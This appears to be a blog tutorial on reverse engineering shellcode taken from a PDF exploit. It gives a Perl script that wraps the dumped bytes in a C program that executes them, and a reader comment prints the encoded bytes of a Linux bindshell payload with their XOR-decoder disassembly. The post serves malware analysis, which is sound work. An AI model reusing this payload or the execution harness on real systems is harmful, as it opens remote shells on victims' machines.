For this walk-through, I'll start with JavaScript that has already been extracted from a PDF file and de-obfuscated. So this isn't step 1 of fully reversing a PDF exploit, but for the first several steps, check out Part 2 of this slide deck.
What you'll need:
- A safe place to play with exploits (I'll be using an image in VMWare Workstation.)
- JavaScript debugger (I highly recommend and will be using Didier Stevens' modified SpiderMonkey.)
- Perl
- The crap2shellcode.pl script, which you'll find further down in this post
- A C compiler and your favorite binary debugger
I'll be using one of the example Adobe Acrobat exploits from the aforementioned slides for this example. You can grab it from milw0rm.
Step 1 - Converting from UTF-encoded characters to ASCII
Most JavaScript shellcode is encoded as either UTF-8 or UTF-16 characters. It would be easy enough to write a tool to convert from any one of these formats to the typical \x-ed UTF-8 format that we're used to seeing shellcode in. But because of the diversity of encoding and obfuscation showing up in JavaScript exploits today, it's more reliable to use JavaScript to decode the shellcode.
For this task, you need a JavaScript debugger. Didier Stevens' SpiderMonkey mod is a great choice. Start by preparing the shellcode text for passing to the debugger. In this case, drop the rest of the exploit, and then wrap the unescape function in an eval function:
Now run this code through SpiderMonkey. SpiderMonkey will create two log files for the eval command, the one with our ASCII shellcode is eval.001.log.
Step 2 - crap2shellcode.pl
This is why I wrote this script, to take an ASCII dump of some shellcode and automate making it debugger-friendly.
---cut---
#!/bin/perl
#
# crap2shellcode - 11/9/2009 Paul Melson
#
# This script takes stdin from some ascii dump of shellcode
# (i.e. unescape-ed JavaScript sploit) and converts it to
# hex and outputs it in a simple C source file for debugging.
#
# gcc -g3 -o dummy dummy.c
# gdb ./dummy
# (gdb) display /50i shellcode
# (gdb) break main
# (gdb) run
#
use strict;
use warnings;
my $crap;
while($crap=<stdin>) {
my $hex = unpack('H*', "$crap");
my $len = length($hex);
my $start = 0;
print "#include <stdio.h>\n\n";
print "static char shellcode[] = \"";
for (my $i = 0; $i < length $hex; $i+=4) {
my $a = substr $hex, $i, 2;
my $b = substr $hex, $i+2, 2;
print "\\x$b\\x$a";
}
print "\";\n\n";
}
print "int main(int argc, char *argv[])\n";
print "{\n";
print " void (*code)() = (void *)shellcode;\n";
print " code();\n";
print " exit(0);\n";
print "}\n";
print "\n";
--paste--
The output of passing eval.001.log through crap2shellcode.pl is a C program that makes debugging the shellcode easy.
Step 3 - View the shellcode/assembly in a debugger
First we have to build it. Since we know that this shellcode is a Linux bindshell the logical choice for where and how to build is Linux with gcc. Similarly, we can use gdb to dump the shellcode. For Win32 shellcode, we would probably pick Visual Studio Express and OllyDbg. Just about any Windows C compiler and debugger will work fine, though.
To build the C code we generated in step 2 with gcc, use the following:
gcc -g3 shellcode.c -o shellcode
The '-g3' flag builds the binary with labels for function stack tracing. This is necessary for debugging the binary. Or at least it makes it a whole lot easier.
Now open the binary in gdb, print *shellcode in x/50i format, set a breakpoint at main(), and run it.
$ gdb ./shellcode
(gdb) display /50i shellcode
(gdb) break main
(gdb) run
Hello, nice post but you have gone slightly wrong in your approach.
ReplyDeleteWhen converting the original utf encoded string you need to flip the bytes so they are as they appear in memory, e.g. "%uC92B%uE983" becomes 2B C9 83 E9.
Here is a python prog to do it:
#-[foo.py begin]---------------------------#
import struct
s1 = "\xc9\x2b\xe9\x83\xd9\xeb\xd9\xee\x24\x74\x5b\xf4\x73\x81\x13\x13\x29\x89\x83\x57\xfc\xeb\xf4\xe2\x52\x22\x14\x7a\xe3\x40\x3d\x2b\xd1\x75\xde\xb0\x44\xf2\xc1\xa9\xdb\x50\x3f\x4f\xd5\x02\x04\x4f\x68\x9a\x31\x43\xd9\x4b\x01\x78\x68\x9a\xd7\xe4\xef\xa3\xb4\xf8\x09\xde\x05\x7b\xca\x45\xb6\xa0\xef\xa3\xd7\xe4\xe3\x80\x0e\x2b\xb6\xa3\xd7\xe4\xf0\x5a\xe7\xd0\xdb\x18\x78\x41\xfa\x3c\x3f\x41\xeb\x3c\x39\x40\x6a\x9a\x04\x7b\x68\x9a\xd7\xe4"
s2 = ""
i = 0
while i < len(s1):
s2 += s1[i+1] + s1[i]
i += 2
print s2
#-[foo.py end]-----------------------------#
running this script to generate a binary blob:
>python foo.py > scode.bin
and disassemble the blob with ndisasm (http://www.nasm.us/):
>ndisasm -b 32 scode.bin
00000000 2BC9 sub ecx,ecx
00000002 83E9EB sub ecx,byte -0x15
00000005 D9EE fldz
00000007 D97424F4 fnstenv [esp-0xc]
0000000B 5B pop ebx
0000000C 81731313892957 xor dword [ebx+0x13],0x57298913
00000013 83EBFC sub ebx,byte -0x4
00000016 E2F4 loop 0xc
...snip....
we can see the shellcode starts by finding its address in memory and begins decrypting itself with an XOR loop and a key of 0x57298913.
You're exactly right. Nice catch! I've changed my Perl code in the post so that it flips the bits correctly.
ReplyDelete